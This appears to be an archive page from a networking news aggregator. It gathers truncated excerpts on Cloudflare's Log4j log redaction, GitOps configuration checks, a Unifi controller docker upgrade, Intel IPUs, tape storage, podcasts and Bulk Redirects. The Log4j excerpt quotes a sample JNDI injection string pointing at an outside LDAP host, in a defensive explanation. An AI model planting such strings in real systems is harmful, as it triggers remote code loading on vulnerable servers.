Archive

Category Archives for "Networking"

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility.  Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote Continue reading

Checking Network Device Configurations in a GitOps CI Pipeline

Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.

When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:

Read more …

Checking Network Device Configurations in a GitOps CI Pipeline

Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.

When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:

Read more …

Unifi docker upgrade

This post is mostly a note to self for when I need to upgrade next time.

Because of the recent bug in log4j, which also affected the Unifi controller, I decided to finally upgrade the controller software.

Some background: There a few different ways to run the controller. You can use “the cloud”, run it yourself on some PC or raspberry pi, or you can buy their appliance.

I run it myself, because I already have a raspberry pi 4 running, which is cheaper than the appliance, and gives me control of my data and works during an ISP outage.

I thought it’d be a good opportunity to play with docker, too.

How to upgrade

Turns out I’d saved the command I used to create the original docker image. Good thing too, because it seems that upgrading is basically delete the old, install the new.

  1. Take a backup from the UI.
  2. Stop the old instance (docker stop <old-name-here>).
  3. Take a backup of the state directory.
  4. Make sure the old instance doesn’t restart (docker update --restart=no <old-name-here>).
  5. Create a new instance with the same state directory.
  6. Wait a long time (at least on Raspberry Pi), like Continue reading

Intel teams with hardware vendors for high-performance network card

Intel announced a collaboration with Inspur, Ruijie Networks, and Silicom Connectivity Solutions to design and develop new infrastructure processing units (IPU) using both a CPU and FPGA.IPU--what Intel calls a data-processing unit (DPU)--is a programmable networking device designed to offload network processing tasks such as storage virtualization, network virtualization, and security from the CPU. That reduces overhead and frees up the CPU to focus on its primary data-processing functions. They are becoming a real growth industry, with multiple products on the market from Nvidia, Marvell, Fungible, and Xilinx.To read this article in full, please click here

Intel, hardware vendors working on a high-performance network card

Intel announced a collaboration with Inspur, Ruijie Networks, and Silicom Connectivity Solutions to design and develop new infrastructure processing units (IPU) using both a CPU and FPGA.IPU—what Intel calls a data-processing unit (DPU)—is a programmable networking device designed to offload network processing tasks such as storage virtualization, network virtualization, and security from the CPU. That reduces overhead and frees up the CPU to focus on its primary data-processing functions. They are becoming a real growth industry, with multiple products on the market from Nvidia, Marvell, Fungible, and Xilinx.To read this article in full, please click here

Looking at Linux disk usage with the ncdu command

The ncdu command provides a useful and convenient way to view disk usage. The name stands for "NCurses disk usage". This means that it's based on ncurses which, like curses, is a terminal control library used on Unix/Linux systems. The curses part of each name is a pun on "cursor" or "cursor optimization" and is unrelated to the use of foul language.You can think of ncdu as a disk usage analyzer with an ncurses interface. It can be especially useful when looking for disk-space hogs on a remote server for which you don't have access to a graphical interface.[Get regularly scheduled insights by signing up for Network World newsletters.] To use ncdu, you can just type "ncdu", but what you will see depends on where you have positioned yourself in the file system as it reports the space used by files and directories in that location.To read this article in full, please click here

The latest tape storage is faster and holds more, but is it better?

Magnetic storage tape has’t been the recommended destination for the initial backup copy of data for quite some time, and the question is whether LTO-9, the latest tape open standard, and other market dynamics will changed that.Here's a look at modern tape drives, discussion of the degree to which ransomware changes the equation, and a closer look at LTO-9.[Get regularly scheduled insights by signing up for Network World newsletters.] Tape drives: Too fast for their own good?In the 80s and early 90s, there was almost a perfect match between the speed of tape drives and the speed of the backup infrastructure. The backup drives were capable of writing at roughly the same speed that the backup system could send.To read this article in full, please click here

Looking at Linux disk usage with the ncdu command

The ncdu command provides a useful and convenient way to view disk usage. The name stands for "NCurses disk usage". This means that it's based on ncurses which, like curses, is a terminal control library used on Unix/Linux systems. The curses part of each name is a pun on "cursor" or "cursor optimization" and is unrelated to the use of foul language.You can think of ncdu as a disk usage analyzer with an ncurses interface. It can be especially useful when looking for disk-space hogs on a remote server for which you don't have access to a graphical interface.[Get regularly scheduled insights by signing up for Network World newsletters.] To use ncdu, you can just type "ncdu", but what you will see depends on where you have positioned yourself in the file system as it reports the space used by files and directories in that location.To read this article in full, please click here

The latest tape storage is faster and holds more, but is it better?

Magnetic storage tape has’t been the recommended destination for the initial backup copy of data for quite some time, and the question is whether LTO-9, the latest tape open standard, and other market dynamics will changed that.Here's a look at modern tape drives, discussion of the degree to which ransomware changes the equation, and a closer look at LTO-9.[Get regularly scheduled insights by signing up for Network World newsletters.] Tape drives: Too fast for their own good?In the 80s and early 90s, there was almost a perfect match between the speed of tape drives and the speed of the backup infrastructure. The backup drives were capable of writing at roughly the same speed that the backup system could send.To read this article in full, please click here

Tech Bytes: Bringing ChatOps Into SD-WAN To Simplify Operations (Sponsored)

Today on the Tech Bytes podcast, sponsored by Palo Alto Networks, we discuss a new ChatOps feature in Palo Alto’s Prisma SD-WAN. Engineers and administrators can query the SD-WAN controller from a chat app such as Microsoft Teams and get a meaningful response. Sutapa Bansal, Director of Product Management at Palo Alto Networks, joins us to discuss how it works, use cases, and implementation.

The post Tech Bytes: Bringing ChatOps Into SD-WAN To Simplify Operations (Sponsored) appeared first on Packet Pushers.

Tech Bytes: Bringing ChatOps Into SD-WAN To Simplify Operations (Sponsored)

Today on the Tech Bytes podcast, sponsored by Palo Alto Networks, we discuss a new ChatOps feature in Palo Alto’s Prisma SD-WAN. Engineers and administrators can query the SD-WAN controller from a chat app such as Microsoft Teams and get a meaningful response. Sutapa Bansal, Director of Product Management at Palo Alto Networks, joins us to discuss how it works, use cases, and implementation.

Aruba’s EdgeConnect Microbranch aims to simplify remote-work networking

Hewlett Packard Enterprise (HPE) subsidiary Aruba Networks has announced a new offering, called EdgeConnect Microbranch, designed to simplify the complexity of work-from-home networking for enterprises.The COVID-19 pandemic has forced enterprises to change the way they use their networks as they had to support an increasing number of users and devices connecting from remote locations. During the pandemic the number of workers working remotely for enterprises jumped, reaching 72% of the total workforce, compared to just 38% before COVID hit, according to an IDC survey. The survey also showed that enterprises expect that more than half of their employees will work remotely in one way or another, indicating the need of a long-term shift in network architectures.To read this article in full, please click here

HS014 Software Defined Infrastructure – New Build or Not ?

Do you need new hardware to cloud enable your infrastructure ? Should you strategise products on new hardware/greenfield basis or enable your existing brownfield infrastructure ? In this episode we discuss value of enabling existing infrastructure Beware of the vendor goldfield that Greenfield represents Whether supply chain impacts your decisions ? The value of federated […]

The post HS014 Software Defined Infrastructure – New Build or Not ? appeared first on Packet Pushers.

HS014 Software Defined Infrastructure – New Build or Not ?

Do you need new hardware to cloud enable your infrastructure ? Should you strategise products on new hardware/greenfield basis or enable your existing brownfield infrastructure ? In this episode we discuss value of enabling existing infrastructure Beware of the vendor goldfield that Greenfield represents Whether supply chain impacts your decisions ? The value of federated... Read more »

Network Break 363: Broadcom Buys AppNeta For Experience Monitoring; Cloudflare Offers New Firewall Service

This week's Network Break asks whether Broadcom's acquisition of AppNeta, which offers SaaS-based digital experience monitoring, is a good fit. We look at new features in the SONiC network OS, dive into a new firewall service available from Cloudflare, and more IT news.

The post Network Break 363: Broadcom Buys AppNeta For Experience Monitoring; Cloudflare Offers New Firewall Service appeared first on Packet Pushers.

Maximum redirects, minimum effort: Announcing Bulk Redirects

Maximum redirects, minimum effort: Announcing Bulk Redirects

404: Not Found

Maximum redirects, minimum effort: Announcing Bulk Redirects

The Internet is a dynamic place. Websites are constantly changing as technologies and business practices evolve. What was front-page news is quickly moved into a sub-directory. To ensure website visitors continue to see the correct webpage even if it has been moved, administrators often implement URL redirects.

A URL redirect is a mapping from one location on the Internet to another, effectively telling the visitor's browser that the location of the page has changed, and where they can now find it. This is achieved by providing a virtual ‘link’ between the content’s original and new location.

URL Redirects have typically been implemented as Page Rules within Cloudflare, up to a maximum of 125 URL redirects per zone. This limitation meant customers with a need for more URL redirects had to implement alternative solutions such Cloudflare Workers to achieve their goals.

To simplify the management and implementation of URL redirects at scale we have created Bulk Redirects. Bulk Redirects is a new product that allows an administrator to upload and enable hundreds of thousands of URL redirects within minutes, without having to write a single line of code.

We’ve moved!

Mail forwarding is a product offered by postal Continue reading

1 515 516 517 518 519 3,464